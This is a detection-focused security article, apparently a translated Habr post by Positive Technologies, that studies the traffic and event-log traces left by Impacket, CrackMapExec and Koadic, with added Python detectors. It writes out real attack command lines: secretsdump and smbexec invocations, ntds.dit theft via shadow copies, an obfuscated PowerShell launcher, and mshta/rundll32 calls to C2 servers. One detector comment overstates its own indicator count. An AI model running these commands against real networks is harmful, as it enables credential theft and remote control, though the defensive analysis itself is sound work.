How to detect attacks on Windows infrastructure: studying hacker tools


The number of attacks on corporate networks grows every year: in 2017, for example, 13% more unique incidents were recorded than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. That includes networks where Windows is the main operating system. In 2017-2018, APT Dragonfly, APT28 and APT MuddyWater carried out attacks on government and military organizations in Europe, North America and Saudi Arabia. And they used three tools for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It is worth noting that these tools are not used for the initial breach, but for developing an attack inside the infrastructure. Attackers use them at various stages of an attack after penetrating the perimeter. Such activity is, incidentally, hard to detect, and it is often only possible with technology that detects traces of compromise in network traffic, or with tools that make it possible to spot an attacker's actions once he is already inside the infrastructure. The tools provide a range of functions, from file transfer to interacting with the registry and executing commands on a remote machine. We studied these tools to determine what their network activity looks like.

What we had to do:

  • Understand how the hacking tools work. Find out what attackers need in order to use them and which technologies they can make use of.
  • Find what information security tools miss in the first stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider, or because the attacker is exploiting a hole in the infrastructure that was not previously known. It then becomes possible to restore the whole chain of his actions, hence the desire to detect further movement.
  • Eliminate false positives in intrusion detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, frequent errors are possible. Usually an infrastructure contains enough ways, indistinguishable from legitimate ones at first glance, to obtain any information.

What do these tools give attackers? In the case of Impacket, the attacker gets a large library of modules that can be used at the different stages of an attack that follow breaching the perimeter. Many tools use Impacket modules internally, Metasploit for instance: it has dcomexec and wmiexec for remote execution, and secretsdump for obtaining accounts from memory, all of which were added from Impacket. As a result, correctly detecting the activity of such a library will ensure detection of its derivatives as well.

It is no accident that the developers wrote "Powered by Impacket" about CrackMapExec (or simply CME). In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, deploying a Meterpreter or Empire agent for remote execution, and Bloodhound on board.

The third tool we chose was Koadic. It is quite recent: it was presented at the international hacker conference DEFCON 25 in 2017 and stands out for its non-standard approach: it works over HTTP, Java Script and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses the dependencies and libraries built into Windows. Its creators call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very broad, ranging from reconnaissance inside AD and collecting data from internal MS SQL servers, to techniques for obtaining credentials: the SMB relay attack, and obtaining the ntds.dit file with user password hashes from a domain controller. Impacket also executes commands remotely using four different methods: WMI, Windows Scheduler Management Service, DCOM and SMB, and requires credentials to do so.

Secretsdump

Let's look at secretsdump. This module can target both user machines and domain controllers. It can be used to obtain copies of the memory areas LSA, SAM, SECURITY and NTDS.dit, so it can be seen at different stages of an attack. The first step in the module's operation is authentication over SMB, which requires either the user's password or its hash in order to carry out a Pass the Hash attack automatically. Next comes a request to open access to the Service Control Manager (SCM) and to obtain access to the registry over the winreg protocol, by means of which the attacker can find the data of the registry branches of interest and obtain the results over SMB.

In Fig. 1 we see exactly how, when the winreg protocol is used, access is obtained with a registry key under LSA. To do this, the DCERPC command with opcode 15, OpenKey, is used.

Fig. 1. Opening a registry key using the winreg protocol

Next, once access to the key is obtained, its values are saved with the SaveKey command with opcode 20. Impacket does this in a very specific way. It saves the values to a file whose name is a string of 8 random characters with .tmp appended. In addition, the subsequent upload of this file takes place over SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining a registry key from a remote machine

It turns out that such activity on the network can be detected by queries to certain registry branches over the winreg protocol, specific names, commands and their order.

This module also leaves traces in the Windows event log, which makes it easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following sequence of events:

1. 4624 - remote logon.
2. 5145 - checking access rights to the remote winreg service.
3. 5145 - checking access rights to a file in the System32 directory. The file has the random name mentioned above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a process with the command line:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - creation of a process with the command line:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - creation of a process with the command line:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like many post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on a remote machine. This module also requires authentication over SMB, either with a password or with a password hash. In Fig. 3 we see an example of how such a tool works, in this case an interactive administrator console.

Fig. 3. Interactive smbexec console

The first step of smbexec after authentication is opening the SCM with the OpenSCManagerW (15) command. The request is notable: the MachineName field has the value DUMMY.

Fig. 4. Request to open the Service Control Manager

Next, a service is created with the CreateServiceW (12) command. In the case of smbexec we see the same command construction logic every time. In Fig. 5 green marks the parameters that do not change, yellow the ones an attacker can change. It is easy to see that the name of the executable file, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service using the Service Control Manager

Smbexec also leaves obvious traces in the Windows log. In the Windows Server 2016 log for an interactive shell with the ipconfig command, we will see the following sequence of events:

1. 4697 - installation of a service on the victim's machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of a cmd.exe process with the arguments from item 1.
3. 5145 - checking access rights to the __output file in the C$ share.
4. 4697 - installation of a service on the victim's machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a cmd.exe process with the arguments from item 4.
6. 5145 - checking access rights to the __output file in the C$ share.

Impacket is the foundation on which attack tools are built. It supports almost all the protocols found in Windows infrastructure and at the same time has its own characteristic features: the specific winreg requests, the use of the SCM API with a characteristic command form, the file name format, and the SMB share SYSTEM32.
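The event sequences listed for secretsdump and for smbexec share one fingerprint: a command echoed into %TEMP%\execute.bat, its output redirected to a file named __output, the batch file run and then deleted. The following Python is an added detection example written for this article, not code from Impacket or from the authors' product. It runs over constructed Security-log records (the field names are a simplified stand-in for the real event XML, and the file names and addresses are made up) and tags each record with the Impacket artifacts it carries, then names the module whose combination of artifacts is present.

```python
import re

# Constructed sample Security-log records, reduced to the fields the rules need.
# They are modelled on the event sequences listed above, not captured from a lab.
SAMPLE_EVENTS = [
    {"id": 4624, "logon_type": 3, "user": r"contoso\Administrator"},
    {"id": 5145, "share": r"\\*\IPC$", "relative_target": "winreg"},
    {"id": 5145, "share": r"\\*\ADMIN$", "relative_target": r"System32\mNdZnMbT.tmp"},
    {"id": 4688, "command_line": r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    {"id": 4688, "command_line": r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    {"id": 4697, "service_file_name": r"%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"id": 4688, "command_line": r'"C:\Windows\System32\cmd.exe" /c ipconfig /all'},  # ordinary admin use, control case
]

RULES = {
    # Impacket's execution wrapper: echo a command into %TEMP%\execute.bat,
    # send its output to a file called __output, run the batch file, delete it.
    "impacket_exec_wrapper": re.compile(r"__output.*>\s*%TEMP%\\execute\.bat.*del %TEMP%\\execute\.bat", re.I),
    # secretsdump's -use-vss path: list/create/delete shadow copies ...
    "vss_shadow_copy": re.compile(r"vssadmin\s+(list|create|delete)\s+shadows?", re.I),
    # ... and copy ntds.dit out of the shadow copy.
    "ntds_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\NTDS\\ntds\.dit", re.I),
    # smbexec's service binary: %COMSPEC% writing to \\127.0.0.1\C$\__output.
    "smbexec_service": re.compile(r"%COMSPEC% /Q /c echo .*\^> \\\\127\.0\.0\.1\\C\$\\__output", re.I),
}
# SaveKey output: an 8-character random name with .tmp, read back from System32.
TMP_IN_SYSTEM32 = re.compile(r"System32\\\w{8}\.tmp$", re.I)


def classify(event):
    """Return the set of rule names that fire for a single event record."""
    tags = set()
    text = event.get("command_line") or event.get("service_file_name") or ""
    for name, rx in RULES.items():
        if rx.search(text):
            tags.add(name)
    if event["id"] == 5145:
        target = event.get("relative_target", "")
        if target.lower() == "winreg":
            tags.add("remote_winreg")
        if TMP_IN_SYSTEM32.search(target):
            tags.add("reg_savekey_tmp")
    if event["id"] == 4697 and "impacket_exec_wrapper" in tags:
        tags.add("service_backed_shell")  # the wrapper installed as a service, not just run
    return tags


def assess(events):
    """Aggregate tags over a sequence of events and name the Impacket module they add up to."""
    tags = set()
    for ev in events:
        tags |= classify(ev)
    verdicts = []
    if {"remote_winreg", "reg_savekey_tmp"} <= tags or {"vss_shadow_copy", "ntds_from_shadow"} <= tags:
        verdicts.append("secretsdump")
    if {"smbexec_service", "service_backed_shell"} <= tags:
        verdicts.append("smbexec")
    return {"tags": sorted(tags), "verdicts": verdicts}


if __name__ == "__main__":
    print(assess(SAMPLE_EVENTS))
```

The verdict logic deliberately needs two independent artifacts per module (for example winreg access plus the .tmp read, or the vssadmin call plus the ntds.dit copy) because any one of them on its own, such as a vssadmin run, also occurs in legitimate administration; the control record at the end of the sample produces no tags at all.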

CRACKMAPEXEC

The CME tool was designed primarily to automate the routine actions an attacker has to perform to advance inside a network. It allows you to work together with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, allows advanced reconnaissance inside a network. It collects data about users, machines, groups and sessions, and is supplied as a PowerShell script or a binary file. The LDAP or SMB protocols are used to collect the information. The CME integration module allows Bloodhound to be downloaded to the victim's machine, run, and the collected data received after execution, thereby automating the actions in the system and making them less noticeable. The Bloodhound graphical shell presents the collected data as graphs, which allows you to find the shortest path from the attacker's machine to a domain administrator.

Fig. 6. Bloodhound interface

To run on the victim's machine, the module creates a task using ATSVC and SMB. ATSVC is the interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: it is a call to cmd.exe with obfuscated code passed as arguments inside XML.

Fig. 7. Creating a task via CME

After the task is submitted for execution, the victim's machine starts Bloodhound, and this can be seen in the traffic. The module is characterized by LDAP queries to obtain the standard groups and the list of all machines and users in the domain, and by obtaining information about active user sessions via the SRVSVC NetSessEnum request.

Fig. 8. Obtaining the list of active sessions over SMB

In addition, launching Bloodhound on a victim machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name "C:\Windows\System32\cmd.exe". What is notable about it is the command-line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
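The command line above is worth decoding from the defender's side, because the two constructs in it are what a detection rule should key on: the first parenthesis indexes into an environment variable and joins the picked letters into a cmdlet name, the second builds a string from a [char[]] array. The Python below is an added example written for this article, not CME's code or the authors' product; it resolves both constructs and scores the other launch flags. It assumes the default value of %COMSPEC% on the victim (C:\WINDOWS\system32\cmd.exe), and its sample command line is a constructed one with a short made-up char array standing in for the payload the article elides.

```python
import re

# Assumed default %COMSPEC%; the index trick only resolves to the same letters
# if the value on the victim is this string.
DEFAULT_COMSPEC = r"C:\WINDOWS\system32\cmd.exe"

# Constructed sample modelled on the Bloodhound launcher command line; the char
# array is a made-up prefix, not the article's elided payload. BENIGN is a
# control: an ordinary administrative PowerShell call.
SAMPLE = ("cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C \" & "
          "( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101, 114)-jOIN'' ) \"")
BENIGN = "powershell.exe -NoProfile -Command Get-Service -Name Spooler"

ENV_INDEX = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.I)
CHAR_ARRAY = re.compile(r"\[char\[\]\]\(([\d,\s]+)\)\s*-join\s*''", re.I)
# Casings a person or a tool normally emits; anything else points to randomised case.
CANONICAL = {"comspec": {"comspec", "COMSPEC", "ComSpec"},
             "join": {"join", "JOIN", "Join"},
             "char": {"char", "CHAR", "Char"}}


def _ints(csv):
    return [int(n) for n in csv.replace(" ", "").split(",") if n]


def resolve_env_index(cmd, env=None):
    """Resolve every `$env:VAR[i,j,k] -join ''` to the letters it selects."""
    env = env or {"COMSPEC": DEFAULT_COMSPEC}
    out = []
    for m in ENV_INDEX.finditer(cmd):
        value = env.get(m.group(1).upper())
        if value is not None:
            out.append("".join(value[i] for i in _ints(m.group(2)) if i < len(value)))
    return out


def decode_char_arrays(cmd):
    """Turn every `[char[]](n, n, ...) -join ''` back into the string it builds."""
    return ["".join(chr(n) for n in _ints(m.group(1))) for m in CHAR_ARRAY.finditer(cmd)]


def indicators(cmd):
    """List the obfuscation and launch-flag indicators present in a command line."""
    found = []
    low = cmd.lower()
    if re.search(r"-exec(utionpolicy)?\s+bypass", low):
        found.append("execution_policy_bypass")
    if re.search(r"-w(indowstyle)?\s+(1|hidden)\b", low):
        found.append("hidden_window")
    if "-noni" in low:
        found.append("non_interactive")
    if "-nop" in low:
        found.append("no_profile")
    if ENV_INDEX.search(cmd):
        found.append("env_var_index_join")
    if CHAR_ARRAY.search(cmd):
        found.append("char_array_join")
    for kw, canon in CANONICAL.items():
        if any(m.group(0) not in canon for m in re.finditer(kw, cmd, re.I)):
            found.append("irregular_case:" + kw)
    # The index trick in the sample picks I, e, x from the COMSPEC path: Invoke-Expression.
    if any(s.lower() == "iex" for s in resolve_env_index(cmd)):
        found.append("resolves_to_iex")
    return found


def is_suspicious(cmd, threshold=4):
    return len(indicators(cmd)) >= threshold


if __name__ == "__main__":
    print(resolve_env_index(SAMPLE), decode_char_arrays(SAMPLE))
    print(indicators(SAMPLE))
```

A single flag such as -NoProfile is common in legitimate scripts, which is why the verdict is a count over several independent indicators rather than any one match; the control command line scores one, the sample scores ten.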

Enum_avproducts

The enum_avproducts module is very interesting in terms of both functionality and implementation. WMI lets you use the WQL query language to retrieve data about various Windows objects, which is exactly what this CME module does. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim's machine. To obtain the necessary data, the module connects to the root\SecurityCenter2 namespace, then generates a WQL query and receives the response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (Trace WMI-Activity), whose events contain useful information about WQL queries, is often disabled. But if it is enabled, then when the enum_avproducts script is run, an event with ID 11 will be recorded. It will contain the name of the user who sent the request and the name in the root\SecurityCenter2 namespace.

Each of the CME modules had artifacts of its own, whether specific WQL queries, the creation of a particular kind of task in the task scheduler with obfuscation, or the Bloodhound-specific activity in LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living off the land trend, that is, it has no external dependencies and uses standard Windows tools. It is a full Command & Control (CnC) tool, since after infection an "implant" is installed on the machine, allowing it to be controlled. Such a machine, in Koadic's terminology, is called a "zombie". If privileges on the victim side are insufficient for full operation, Koadic can raise them using UAC bypass techniques.

Fig. 10. Koadic shell

The victim must initiate communication with the Command & Control server. To do this, it contacts a pre-prepared URI and receives the main Koadic body using one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initializing a session with the CnC server

From the WS variable in the response it is clear that execution takes place via WScript.Shell, and the variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE contain the key information about the parameters of the current session. This is the first request-response pair in an HTTP connection with the CnC server. Subsequent requests are directly related to the functionality of the modules (implants) being called. All Koadic modules work only with an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways of launching it. Below is the request-response pair for downloading the Mimikatz implant.

Fig. 12. Sending Mimikatz to Koadic

You can see how the URI format in the request has changed. It now contains a value for the csrf variable, which is responsible for the selected module. Pay no attention to its name; we all know that CSRF usually means something else. The response was the same main body of Koadic, with code related to Mimikatz added to it. It is quite large, so let's look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and arguments for launching Mimikatz. The result of execution is transmitted over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules that execute commands remotely. Here we see the same URI generation method with the familiar sid and csrf variables. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Below is the code contained in the HTTP response of the CnC server.

Fig. 14. exec_cmd implant code

The GAWTUUGCFI variable with the familiar WS attribute is required for code execution. With its help the implant calls the shell, handling two code branches: shell.exec, which returns the output data stream, and shell.run, which returns nothing.

Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:

  • a special form of HTTP requests,
  • use of the winHttpRequests API,
  • creation of a WScript.Shell object via ActiveXObject,
  • a large executable body.

The initial connection is initiated by the stager, so its activity can be detected through Windows events. For mshta this is event 4688, which indicates the creation of a process with the following start:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see other 4688 events with characteristic attributes:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
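The Koadic artifacts described in this section sit in three places: the request line (a short random path followed by sid and csrf joined with a semicolon instead of the usual &), the stager response body (the session variables and WScript.Shell created through ActiveXObject), and the 4688 command lines (mshta or rundll32 with a URL, and exec_cmd's output redirected to a GUID-named .txt in the user's Temp). The Python below is an added example written for this article, not Koadic's code or the authors' product. All of its sample data is constructed: the address 192.0.2.10 is a documentation address, the session body is cut down to the variables discussed above, and the rundll32 line is shortened to the parts the check needs.

```python
import re
from urllib.parse import urlsplit

# Constructed sample data (not captures from the article's lab): request lines as a
# proxy or IDS would log them, a cut-down stager response body, and 4688 command lines.
SAMPLE_REQUESTS = [
    "GET /dXpT6 HTTP/1.1",
    "GET /dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c;csrf= HTTP/1.1",
    "GET /dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983 HTTP/1.1",
    "GET /index.html?sid=abc&page=2 HTTP/1.1",  # ordinary web traffic, control case
]
SAMPLE_BODY = ("<script>var STAGER='dXpT6';var SESSIONKEY='1dbef040';var JOBKEY='';"
               "var JOBKEYPATH='';var EXPIRE='';var ws=new ActiveXObject('WScript.Shell');</script>")
SAMPLE_PROCS = [
    r"C:\Windows\system32\mshta.exe http://192.0.2.10:9999/dXpT6",
    r"rundll32.exe http://192.0.2.10:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c;csrf=;mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /c ipconfig /all',  # ordinary admin use, control case
]

# sid is a 32-hex session id, csrf a 32-hex module id or empty, joined by ';'.
KOADIC_QUERY = re.compile(r"^sid=[0-9a-f]{32};csrf=(?:[0-9a-f]{32})?$", re.I)
# exec_cmd: chcp 437, the command, stdout and stderr into Temp\<GUID>.txt (applied to lower-cased text).
GUID_TXT_REDIRECT = re.compile(r"chcp 437 &.*1>\s*\S*\\temp\\[0-9a-f-]{36}\.txt 2>&1")
WS_VARS = ("STAGER", "SESSIONKEY", "JOBKEY", "JOBKEYPATH", "EXPIRE")


def classify_request(request_line):
    """Tags for one HTTP request line: the short path and the ;-separated sid/csrf query."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    tags = []
    if re.fullmatch(r"/[A-Za-z0-9]{4,8}", parts.path):
        tags.append("short_random_path")
    if KOADIC_QUERY.match(parts.query):
        tags.append("koadic_sid_csrf_query")
    if ";" in parts.query and "&" not in parts.query and "=" in parts.query:
        tags.append("semicolon_query_separator")
    return tags


def classify_body(body):
    """Tags for a response body: WScript.Shell via ActiveXObject and the session variables."""
    tags = []
    if re.search(r"new\s+ActiveXObject\(\s*['\"]WScript\.Shell['\"]\s*\)", body, re.I):
        tags.append("wscript_shell_via_activex")
    if sum(bool(re.search(r"\b%s\b" % v, body)) for v in WS_VARS) >= 4:
        tags.append("koadic_session_vars")
    return tags


def classify_process(cmdline):
    """Tags for a 4688 command line: the stager launchers and exec_cmd's output redirection."""
    low = cmdline.lower()
    tags = []
    if "mshta.exe" in low and re.search(r"https?://", low):
        tags.append("mshta_remote_hta")
    if "rundll32.exe" in low and "mshtml,runhtmlapplication" in low:
        tags.append("rundll32_runhtmlapplication")
    if GUID_TXT_REDIRECT.search(low):
        tags.append("koadic_cmd_guid_output")
    return tags


def scan(requests=SAMPLE_REQUESTS, body=SAMPLE_BODY, procs=SAMPLE_PROCS):
    """Count how many indicators each data source contributed."""
    return {
        "http": sum(len(classify_request(r)) for r in requests),
        "body": len(classify_body(body)),
        "process": sum(len(classify_process(p)) for p in procs),
    }


if __name__ == "__main__":
    print(scan())
```

The request-line rule is the one that generalises best across Koadic's stagers, since every module call after the first reuses the same sid/csrf shape regardless of whether mshta, rundll32 or another launcher started the session; the process rules cover the two launchers shown on this page.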

Conclusions

Living off the land is gaining popularity among criminals. They use the tools and mechanisms built into Windows for their own needs. We see the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appearing more and more often in APT reports. The number of forks of these tools on GitHub is also growing, and new ones are appearing (there are already about a thousand now). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools; they are already on the victims' machines and help them bypass security measures. We focus on studying network communication: every tool described above leaves its own traces in network traffic, and studying them in detail allowed us to teach our product PT Network Attack Discovery to detect them, which in turn helps investigate the whole chain of cyber incidents involving them.

Authors:

  • Anton Tyurin, Head of the Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
